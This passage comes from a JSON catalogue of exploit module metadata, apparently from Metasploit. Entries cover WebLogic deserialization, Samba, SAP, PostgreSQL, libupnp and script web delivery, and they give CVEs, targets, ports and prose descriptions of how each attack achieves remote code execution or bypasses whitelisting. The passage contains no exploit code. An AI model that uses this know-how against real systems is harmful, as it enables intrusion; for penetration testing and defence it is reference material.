"path": "/modules/exploits/multi/misc/weblogic_deserialize.rb",
"is_install_path": true,
"ref_name": "multi/misc/weblogic_deserialize",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/weblogic_deserialize_marshalledobject": {
"name": "Oracle Weblogic Server Deserialization RCE - MarshalledObject",
"full_name": "exploit/multi/misc/weblogic_deserialize_marshalledobject",
"rank": 0,
"disclosure_date": "2016-07-19",
"type": "exploit",
"author": [
"Andres Rodriguez",
"Jacob Baines",
"Aaron Soto"
],
"description": "An unauthenticated attacker with network access to the Oracle Weblogic Server T3\n interface can send a serialized object (weblogic.corba.utils.MarshalledObject)\n to the interface to execute code on vulnerable hosts.",
"references": [
"CVE-2016-3510"
],
"platform": "Solaris,Unix,Windows",
"arch": "",
"rport": 7001,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Unix",
"Windows",
"Solaris"
],
"mod_time": "2019-04-03 09:21:55 +0000",
"path": "/modules/exploits/multi/misc/weblogic_deserialize_marshalledobject.rb",
"is_install_path": true,
"ref_name": "multi/misc/weblogic_deserialize_marshalledobject",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/weblogic_deserialize_rawobject": {
"name": "Oracle Weblogic Server Deserialization RCE - Raw Object",
"full_name": "exploit/multi/misc/weblogic_deserialize_rawobject",
"rank": 600,
"disclosure_date": "2015-01-28",
"type": "exploit",
"author": [
"Andres Rodriguez",
"Stephen Breen",
"Aaron Soto"
],
"description": "An unauthenticated attacker with network access to the Oracle Weblogic Server T3\n interface can send a serialized object (weblogic.jms.common.StreamMessageImpl)\n to the interface to execute code on vulnerable hosts.",
"references": [
"CVE-2015-4852"
],
"platform": "Solaris,Unix,Windows",
"arch": "",
"rport": 7001,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Unix",
"Windows",
"Solaris"
],
"mod_time": "2019-03-26 17:44:52 +0000",
"path": "/modules/exploits/multi/misc/weblogic_deserialize_rawobject.rb",
"is_install_path": true,
"ref_name": "multi/misc/weblogic_deserialize_rawobject",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/weblogic_deserialize_unicastref": {
"name": "Oracle Weblogic Server Deserialization RCE - RMI UnicastRef",
"full_name": "exploit/multi/misc/weblogic_deserialize_unicastref",
"rank": 600,
"disclosure_date": "2017-01-25",
"type": "exploit",
"author": [
"Andres Rodriguez",
"Jacob Baines",
"Aaron Soto"
],
"description": "An unauthenticated attacker with network access to the Oracle Weblogic Server T3\n interface can send a serialized object (sun.rmi.server.UnicastRef)\n to the interface to execute code on vulnerable hosts.",
"references": [
"CVE-2017-3248"
],
"platform": "Solaris,Unix,Windows",
"arch": "",
"rport": 7001,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Unix",
"Windows",
"Solaris"
],
"mod_time": "2019-04-01 17:57:28 +0000",
"path": "/modules/exploits/multi/misc/weblogic_deserialize_unicastref.rb",
"is_install_path": true,
"ref_name": "multi/misc/weblogic_deserialize_unicastref",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/wireshark_lwres_getaddrbyname": {
"name": "Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow",
"full_name": "exploit/multi/misc/wireshark_lwres_getaddrbyname",
"rank": 500,
"disclosure_date": "2010-01-27",
"type": "exploit",
"author": [
"babi",
"jduck <jduck@metasploit.com>",
"redsand"
],
"description": "The LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through\n 1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer\n overflow. This bug found and reported by babi.\n\n This particular exploit targets the dissect_getaddrsbyname_request function. Several\n other functions also contain potentially exploitable stack-based buffer overflows.\n\n The Windows version (of 1.2.5 at least) is compiled with /GS, which prevents\n exploitation via the return address on the stack. Sending a larger string allows\n exploitation using the SEH bypass method. However, this packet will usually get\n fragmented, which may cause additional complications.\n\n NOTE: The vulnerable code is reached only when the packet dissection is rendered.\n If the packet is fragmented, all fragments must be captured and reassembled to\n exploit this issue.",
"references": [
"CVE-2010-0304",
"OSVDB-61987",
"BID-37985",
"URL-http://www.wireshark.org/security/wnpa-sec-2010-02.html",
"URL-http://anonsvn.wireshark.org/viewvc/trunk-1.2/epan/dissectors/packet-lwres.c?view=diff&r1=31596&r2=28492&diff_format=h"
],
"platform": "Linux,OSX,Windows",
"arch": "",
"rport": 921,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"tshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)",
"wireshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)",
"wireshark 1.2.5 on RHEL 5.4 (x64)",
"wireshark 1.2.5 on Mac OS X 10.5 (x86)",
"wireshark/tshark 1.2.1 and 1.2.5 on Windows (x86)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb",
"is_install_path": true,
"ref_name": "multi/misc/wireshark_lwres_getaddrbyname",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/wireshark_lwres_getaddrbyname_loop": {
"name": "Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)",
"full_name": "exploit/multi/misc/wireshark_lwres_getaddrbyname_loop",
"rank": 500,
"disclosure_date": "2010-01-27",
"type": "exploit",
"author": [
"babi",
"jduck <jduck@metasploit.com>",
"redsand"
],
"description": "The LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through\n 1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer\n overflow. This bug found and reported by babi.\n\n This particular exploit targets the dissect_getaddrsbyname_request function. Several\n other functions also contain potentially exploitable stack-based buffer overflows.\n\n The Windows version (of 1.2.5 at least) is compiled with /GS, which prevents\n exploitation via the return address on the stack. Sending a larger string allows\n exploitation using the SEH bypass method. However, this packet will usually get\n fragmented, which may cause additional complications.\n\n NOTE: The vulnerable code is reached only when the packet dissection is rendered.\n If the packet is fragmented, all fragments must be captured and reassembled to\n exploit this issue.\n\n This version loops, sending the packet every X seconds until the job is killed.",
"references": [
"CVE-2010-0304",
"OSVDB-61987",
"BID-37985",
"URL-http://www.wireshark.org/security/wnpa-sec-2010-02.html",
"URL-http://anonsvn.wireshark.org/viewvc/trunk-1.2/epan/dissectors/packet-lwres.c?view=diff&r1=31596&r2=28492&diff_format=h"
],
"platform": "Linux,OSX,Windows",
"arch": "",
"rport": 921,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"tshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)",
"wireshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)",
"wireshark 1.2.5 on RHEL 5.4 (x64)",
"wireshark 1.2.5 on Mac OS X 10.5 (x86)",
"wireshark/tshark 1.2.1 and 1.2.5 on Windows (x86)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb",
"is_install_path": true,
"ref_name": "multi/misc/wireshark_lwres_getaddrbyname_loop",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/xdh_x_exec": {
"name": "Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution",
"full_name": "exploit/multi/misc/xdh_x_exec",
"rank": 600,
"disclosure_date": "2015-12-04",
"type": "exploit",
"author": [
"Jay Turla",
"Conor Patrick",
"Matt Thayer"
],
"description": "This module allows remote command execution on an IRC Bot developed by xdh.\n This perl bot was caught by Conor Patrick with his shellshock honeypot server\n and is categorized by Markus Zanke as an fBot (Fire & Forget - DDoS Bot). Matt\n Thayer also found this script which has a description of LinuxNet perlbot.\n\n The bot answers only based on the servername and nickname in the IRC message\n which is configured on the perl script thus you need to be an operator on the IRC\n network to spoof it and in order to exploit this bot or have at least the same ip\n to the config.",
"references": [
"URL-https://conorpp.com/blog/a-close-look-at-an-operating-botnet/",
"URL-https://twitter.com/MrMookie/status/673389285676965889",
"URL-https://www.alienvault.com/open-threat-exchange/blog/elasticzombie-botnet-exploiting-elasticsearch-vulnerabilities"
],
"platform": "Unix,Windows",
"arch": "cmd",
"rport": 6667,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"xdh Botnet / LinuxNet perlbot"
],
"mod_time": "2018-08-20 15:43:07 +0000",
"path": "/modules/exploits/multi/misc/xdh_x_exec.rb",
"is_install_path": true,
"ref_name": "multi/misc/xdh_x_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/zend_java_bridge": {
"name": "Zend Server Java Bridge Arbitrary Java Code Execution",
"full_name": "exploit/multi/misc/zend_java_bridge",
"rank": 500,
"disclosure_date": "2011-03-28",
"type": "exploit",
"author": [
"bannedit <bannedit@metasploit.com>"
],
"description": "This module takes advantage of a trust relationship issue within the\n Zend Server Java Bridge. The Java Bridge is responsible for handling interactions\n between PHP and Java code within Zend Server.\n\n When Java code is encountered Zend Server communicates with the Java Bridge. The\n Java Bridge then handles the java code and creates the objects within the Java Virtual\n Machine. This interaction however, does not require any sort of authentication. This\n leaves the JVM wide open to remote attackers. Sending specially crafted data to the\n Java Bridge results in the execution of arbitrary java code.",
"references": [
"OSVDB-71420",
"ZDI-11-113",
"EDB-17078"
],
"platform": "Java",
"arch": "java",
"rport": 10001,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Linux",
"Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/misc/zend_java_bridge.rb",
"is_install_path": true,
"ref_name": "multi/misc/zend_java_bridge",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/mysql/mysql_udf_payload": {
"name": "Oracle MySQL UDF Payload Execution",
"full_name": "exploit/multi/mysql/mysql_udf_payload",
"rank": 600,
"disclosure_date": "2009-01-16",
"type": "exploit",
"author": [
"Bernardo Damele A. G. <bernardo.damele@gmail.com>",
"todb <todb@metasploit.com>",
"h00die"
],
"description": "This module creates and enables a custom UDF (user defined function) on the\n target host via the SELECT ... into DUMPFILE method of binary injection. On\n default Microsoft Windows installations of MySQL (=< 5.5.9), directory write\n permissions not enforced, and the MySQL service runs as LocalSystem.\n\n NOTE: This module will leave a payload executable on the target system when the\n attack is finished, as well as the UDF DLL, and will define or redefine sys_eval()\n and sys_exec() functions.",
"references": [
"URL-http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 3306,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows",
"Linux"
],
"mod_time": "2018-08-20 15:43:07 +0000",
"path": "/modules/exploits/multi/mysql/mysql_udf_payload.rb",
"is_install_path": true,
"ref_name": "multi/mysql/mysql_udf_payload",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/ntp/ntp_overflow": {
"name": "NTP Daemon readvar Buffer Overflow",
"full_name": "exploit/multi/ntp/ntp_overflow",
"rank": 400,
"disclosure_date": "2001-04-04",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a stack based buffer overflow in the\n ntpd and xntpd service. By sending an overly long 'readvar'\n request it is possible to execute code remotely. As the stack\n is corrupted, this module uses the Egghunter technique.",
"references": [
"CVE-2001-0414",
"OSVDB-805",
"BID-2540",
"US-CERT-VU-970472"
],
"platform": "Linux",
"arch": "x86",
"rport": 123,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"RedHat Linux 7.0 ntpd 4.0.99j",
"RedHat Linux 7.0 ntpd 4.0.99j w/debug",
"RedHat Linux 7.0 ntpd 4.0.99k",
"Debugging"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/multi/ntp/ntp_overflow.rb",
"is_install_path": true,
"ref_name": "multi/ntp/ntp_overflow",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/php/php_unserialize_zval_cookie": {
"name": "PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)",
"full_name": "exploit/multi/php/php_unserialize_zval_cookie",
"rank": 200,
"disclosure_date": "2007-03-04",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"GML <grandmasterlogic@gmail.com>",
"Stefan Esser <sesser@hardened-php.net>"
],
"description": "This module exploits an integer overflow vulnerability in the unserialize()\n function of the PHP web server extension. This vulnerability was patched by\n Stefan in version 4.5.0 and applies all previous versions supporting this function.\n This particular module targets numerous web applications and is based on the proof\n of concept provided by Stefan Esser. This vulnerability requires approximately 900k\n of data to trigger due the multiple Cookie headers requirement. Since we\n are already assuming a fast network connection, we use a 2Mb block of shellcode for\n the brute force, allowing quick exploitation for those with fast networks.\n\n One of the neat things about this vulnerability is that on x86 systems, the EDI register points\n into the beginning of the hashtable string. This can be used with an egghunter to\n quickly exploit systems where the location of a valid \"jmp EDI\" or \"call EDI\" instruction\n is known. The EDI method is faster, but the bandwidth-intensive brute force used by this\n module is more reliable across a wider range of systems.",
"references": [
"CVE-2007-1286",
"OSVDB-32771",
"URL-http://www.php-security.org/MOPB/MOPB-04-2007.html"
],
"platform": "Linux",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Linux x86 Generic",
"Linux x86 phpBB2",
"Linux x86 punBB",
"Linux x86 WWWThreads",
"Linux x86 Deadman Redirect",
"Linux x86 PhpWebGallery",
"Linux x86 Ariadne-CMS",
"Linux x86 ProMA",
"Linux x86 eGroupware"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/php/php_unserialize_zval_cookie.rb",
"is_install_path": true,
"ref_name": "multi/php/php_unserialize_zval_cookie",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/php/wp_duplicator_code_inject": {
"name": "Snap Creek Duplicator WordPress plugin code injection",
"full_name": "exploit/multi/php/wp_duplicator_code_inject",
"rank": 0,
"disclosure_date": "2018-08-29",
"type": "exploit",
"author": [
"Julien Legras <julien.legras@synacktiv.com>",
"Thomas Chauchefoin <thomas.chauchefoin@synacktiv.com>"
],
"description": "When the WordPress plugin Snap Creek Duplicator restores a backup, it\n leaves dangerous files in the filesystem such as installer.php and\n installer-backup.php. These files allow anyone to call a function that\n overwrite the wp-config.php file AND this function does not sanitize\n POST parameters before inserting them inside the wp-config.php file,\n leading to arbitrary PHP code execution.\n WARNING: This exploit WILL break the wp-config.php file. If possible try\n to restore backups of the configuration after the exploit to make the\n WordPress site work again.",
"references": [
"URL-https://www.synacktiv.com/ressources/advisories/WordPress_Duplicator-1.2.40-RCE.pdf",
"WPVDB-9123",
"CVE-2018-17207"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"WordPress Duplicator <= 1.2.40"
],
"mod_time": "2018-12-11 11:59:19 +0000",
"path": "/modules/exploits/multi/php/wp_duplicator_code_inject.rb",
"is_install_path": true,
"ref_name": "multi/php/wp_duplicator_code_inject",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/postgres/postgres_createlang": {
"name": "PostgreSQL CREATE LANGUAGE Execution",
"full_name": "exploit/multi/postgres/postgres_createlang",
"rank": 400,
"disclosure_date": "2016-01-01",
"type": "exploit",
"author": [
"Micheal Cottingham",
"midnitesnake",
"Nixawk"
],
"description": "Some installations of Postgres 8 and 9 are configured to allow loading external scripting languages.\n Most commonly this is Perl and Python. When enabled, command execution is possible on the host.\n To execute system commands, loading the \"untrusted\" version of the language is necessary.\n This requires a superuser. This is usually postgres. The execution should be platform-agnostic,\n and has been tested on OS X, Windows, and Linux.\n\n This module attempts to load Perl or Python to execute system commands. As this dynamically loads\n a scripting language to execute commands, it is not necessary to drop a file on the filesystem.\n\n Only Postgres 8 and up are supported.",
"references": [
"URL-http://www.postgresql.org/docs/current/static/sql-createlanguage.html",
"URL-http://www.postgresql.org/docs/current/static/plperl.html",
"URL-http://www.postgresql.org/docs/current/static/plpython.html"
],
"platform": "Linux,OSX,Unix,Windows",
"arch": "cmd",
"rport": 5432,
"autofilter_ports": [
5432
],
"autofilter_services": [
"postgres"
],
"targets": [
"Automatic"
],
"mod_time": "2019-04-01 18:58:14 +0000",
"path": "/modules/exploits/multi/postgres/postgres_createlang.rb",
"is_install_path": true,
"ref_name": "multi/postgres/postgres_createlang",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/realserver/describe": {
"name": "RealServer Describe Buffer Overflow",
"full_name": "exploit/multi/realserver/describe",
"rank": 500,
"disclosure_date": "2002-12-20",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a buffer overflow in RealServer 7/8/9\n and was based on Johnny Cyberpunk's THCrealbad exploit. This\n code should reliably exploit Linux, BSD, and Windows-based\n servers.",
"references": [
"CVE-2002-1643",
"OSVDB-4468"
],
"platform": "BSD,Linux,Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/realserver/describe.rb",
"is_install_path": true,
"ref_name": "multi/realserver/describe",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/samba/nttrans": {
"name": "Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow",
"full_name": "exploit/multi/samba/nttrans",
"rank": 200,
"disclosure_date": "2003-04-07",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module attempts to exploit a buffer overflow vulnerability present in\n versions 2.2.2 through 2.2.6 of Samba.\n\n The Samba developers report this as:\n \"Bug in the length checking for encrypted password change requests from clients.\"\n\n The bug was discovered and reported by the Debian Samba Maintainers.",
"references": [
"CVE-2002-1318",
"OSVDB-14525",
"BID-6210",
"URL-http://www.samba.org/samba/history/samba-2.2.7a.html"
],
"platform": "Linux",
"arch": "",
"rport": 139,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Samba 2.2.x Linux x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/samba/nttrans.rb",
"is_install_path": true,
"ref_name": "multi/samba/nttrans",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/samba/usermap_script": {
"name": "Samba \"username map script\" Command Execution",
"full_name": "exploit/multi/samba/usermap_script",
"rank": 600,
"disclosure_date": "2007-05-14",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a command execution vulnerability in Samba\n versions 3.0.20 through 3.0.25rc3 when using the non-default\n \"username map script\" configuration option. By specifying a username\n containing shell meta characters, attackers can execute arbitrary\n commands.\n\n No authentication is needed to exploit this vulnerability since\n this option is used to map usernames prior to authentication!",
"references": [
"CVE-2007-2447",
"OSVDB-34700",
"BID-23972",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534",
"URL-http://samba.org/samba/security/CVE-2007-2447.html"
],
"platform": "Unix",
"arch": "cmd",
"rport": 139,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/samba/usermap_script.rb",
"is_install_path": true,
"ref_name": "multi/samba/usermap_script",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/sap/sap_mgmt_con_osexec_payload": {
"name": "SAP Management Console OSExecute Payload Execution",
"full_name": "exploit/multi/sap/sap_mgmt_con_osexec_payload",
"rank": 600,
"disclosure_date": "2011-03-08",
"type": "exploit",
"author": [
"Chris John Riley",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module executes an arbitrary payload through the SAP Management Console\n SOAP Interface. A valid username and password for the SAP Management Console must\n be provided. This module has been tested successfully on both Windows and Linux\n platforms running SAP Netweaver. In order to exploit a Linux platform, the target\n system must have available the wget command.",
"references": [
"URL-http://blog.c22.cc/toolsscripts/metasploit-modules/sap_mgmt_con_osexecute/"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 50013,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
50013
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux",
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb",
"is_install_path": true,
"ref_name": "multi/sap/sap_mgmt_con_osexec_payload",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/sap/sap_soap_rfc_sxpg_call_system_exec": {
"name": "SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution",
"full_name": "exploit/multi/sap/sap_soap_rfc_sxpg_call_system_exec",
"rank": 500,
"disclosure_date": "2013-03-26",
"type": "exploit",
"author": [
"nmonkee"
],
"description": "This module abuses the SAP NetWeaver SXPG_CALL_SYSTEM function, on the SAP SOAP\n RFC Service, to execute remote commands. This module needs SAP credentials with\n privileges to use the /sap/bc/soap/rfc in order to work. The module has been tested\n successfully on Windows 2008 64-bit and Linux 64-bit platforms.",
"references": [
"OSVDB-93537",
"URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/"
],
"platform": "Unix,Windows",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux",
"Windows x64"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/sap/sap_soap_rfc_sxpg_call_system_exec.rb",
"is_install_path": true,
"ref_name": "multi/sap/sap_soap_rfc_sxpg_call_system_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/sap/sap_soap_rfc_sxpg_command_exec": {
"name": "SAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution",
"full_name": "exploit/multi/sap/sap_soap_rfc_sxpg_command_exec",
"rank": 500,
"disclosure_date": "2012-05-08",
"type": "exploit",
"author": [
"nmonkee"
],
"description": "This module abuses the SAP NetWeaver SXPG_COMMAND_EXECUTE function, on the SAP\n SOAP RFC Service, to execute remote commands. This module needs SAP credentials with\n privileges to use the /sap/bc/soap/rfc in order to work. The module has been tested\n successfully on Windows 2008 64-bit and Linux 64-bit platforms.",
"references": [
"URL-http://labs.mwrinfosecurity.com/blog/2012/09/03/sap-parameter-injection",
"URL-https://service.sap.com/sap/support/notes/1764994",
"URL-https://service.sap.com/sap/support/notes/1341333"
],
"platform": "Unix,Windows",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux",
"Windows x64"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/sap/sap_soap_rfc_sxpg_command_exec.rb",
"is_install_path": true,
"ref_name": "multi/sap/sap_soap_rfc_sxpg_command_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/script/web_delivery": {
"name": "Script Web Delivery",
"full_name": "exploit/multi/script/web_delivery",
"rank": 0,
"disclosure_date": "2013-07-19",
"type": "exploit",
"author": [
"Andrew Smith \"jakx\" <jakx.ppr@gmail.com>",
"Ben Campbell <eat_meatballs@hotmail.co.uk>",
"Chris Campbell",
"Casey Smith",
"Trenton Ivey",
"g0tmi1k"
],
"description": "This module quickly fires up a web server that serves a payload.\n The provided command which will allow for a payload to download and execute.\n It will do it either specified scripting language interpreter or \"squiblydoo\" via regsvr32.exe\n for bypassing application whitelisting. The main purpose of this module is to quickly establish\n a session on a target machine when the attacker has to manually type in the command:\n e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Execution.\n This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege\n escalations supplied by Meterpreter.\n\n When using either of the PSH targets, ensure the payload architecture matches the target computer\n or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines.\n\n Regsvr32 uses \"squiblydoo\" technique for bypassing application whitelisting.\n The signed Microsoft binary file, Regsvr32, is able to request an .sct file and then execute the included\n PowerShell command inside of it. Both web requests (i.e., the .sct file and PowerShell download/execute)\n can occur on the same port.\n\n \"PSH (Binary)\" will write a file to the disk, allowing for custom binaries to be served up to be downloaded/executed.",
"references": [
"URL-https://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html",
"URL-https://www.pentestgeek.com/2013/07/19/invoke-shellcode/",
"URL-http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/",
"URL-https://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html",
"URL-https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html"
],
"platform": "PHP,Python,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Python",
"PHP",
"PSH",
"Regsvr32",
"PSH (Binary)"
],
"mod_time": "2017-10-26 15:01:53 +0000",
"path": "/modules/exploits/multi/script/web_delivery.rb",
"is_install_path": true,
"ref_name": "multi/script/web_delivery",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/ssh/sshexec": {
"name": "SSH User Code Execution",
"full_name": "exploit/multi/ssh/sshexec",
"rank": 0,
"disclosure_date": "1999-01-01",
"type": "exploit",
"author": [
"Spencer McIntyre",
"Brandon Knight"
],
"description": "This module connects to the target system and executes the necessary\n commands to run the specified payload via SSH. If a native payload is\n specified, an appropriate stager will be used.",
"references": [
"CVE-1999-0502"
],
"platform": "Linux,OSX,Python,Unix",
"arch": "",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Linux x86",
"Linux x64",
"Linux armle",
"Linux mipsle",
"Linux mipsbe",
"Linux aarch64",
"OSX x86",
"OSX x64",
"Python",
"Unix Cmd"
],
"mod_time": "2018-11-04 09:29:41 +0000",
"path": "/modules/exploits/multi/ssh/sshexec.rb",
"is_install_path": true,
"ref_name": "multi/ssh/sshexec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
],
"Reliability": [
"repeatable-session"
]
}
},
"exploit_multi/svn/svnserve_date": {
"name": "Subversion Date Svnserve",
"full_name": "exploit/multi/svn/svnserve_date",
"rank": 200,
"disclosure_date": "2004-05-19",
"type": "exploit",
"author": [
"spoonm <spoonm@no$email.com>"
],
"description": "This is an exploit for the Subversion date parsing overflow. This\n exploit is for the svnserve daemon (svn:// protocol) and will not work\n for Subversion over webdav (http[s]://). This exploit should never\n crash the daemon, and should be safe to do multi-hits.\n\n **WARNING** This exploit seems to (not very often, I've only seen\n it during testing) corrupt the subversion database, so be careful!",
"references": [
"CVE-2004-0397",
"OSVDB-6301",
"BID-10386",
"URL-http://lists.netsys.com/pipermail/full-disclosure/2004-May/021737.html"
],
"platform": "BSD,Linux",
"arch": "x86",
"rport": 3690,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Linux Bruteforce",
"FreeBSD Bruteforce"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/svn/svnserve_date.rb",
"is_install_path": true,
"ref_name": "multi/svn/svnserve_date",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/upnp/libupnp_ssdp_overflow": {
"name": "Portable UPnP SDK unique_service_name() Remote Code Execution",
"full_name": "exploit/multi/upnp/libupnp_ssdp_overflow",
"rank": 300,
"disclosure_date": "2013-01-29",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"Alex Eubanks <endeavor@rainbowsandpwnies.com>",
"Richard Harman <richard@richardharman.com>",
"Frederic Basse <contact@fredericb.info>"
],
"description": "This module exploits a buffer overflow in the unique_service_name()\n function of libupnp's SSDP processor. The libupnp library is used across\n thousands of devices and is referred to as the Intel SDK for UPnP\n Devices or the Portable SDK for UPnP Devices.\n\n Due to size limitations on many devices, this exploit uses a separate TCP\n listener to stage the real payload.",
"references": [
"CVE-2012-5958",
"OSVDB-89611",
"US-CERT-VU-922681",
"URL-https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play"
],
"platform": "Unix",
"arch": "cmd",
"rport": 1900,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Supermicro Onboard IPMI (X9SCL/X9SCM) Intel SDK 1.3.1",
"Axis Camera M1011 5.20.1 UPnP/1.4.1",
"Debug Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb",
"is_install_path": true,
"ref_name": "multi/upnp/libupnp_ssdp_overflow",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/vnc/vnc_keyboard_exec": {
"name": "VNC Keyboard Remote Code Execution",
"full_name": "exploit/multi/vnc/vnc_keyboard_exec",
"rank": 500,
"disclosure_date": "2015-07-10",
"type": "exploit",
"author": [
"xistence <xistence@0x90.nl>"
],
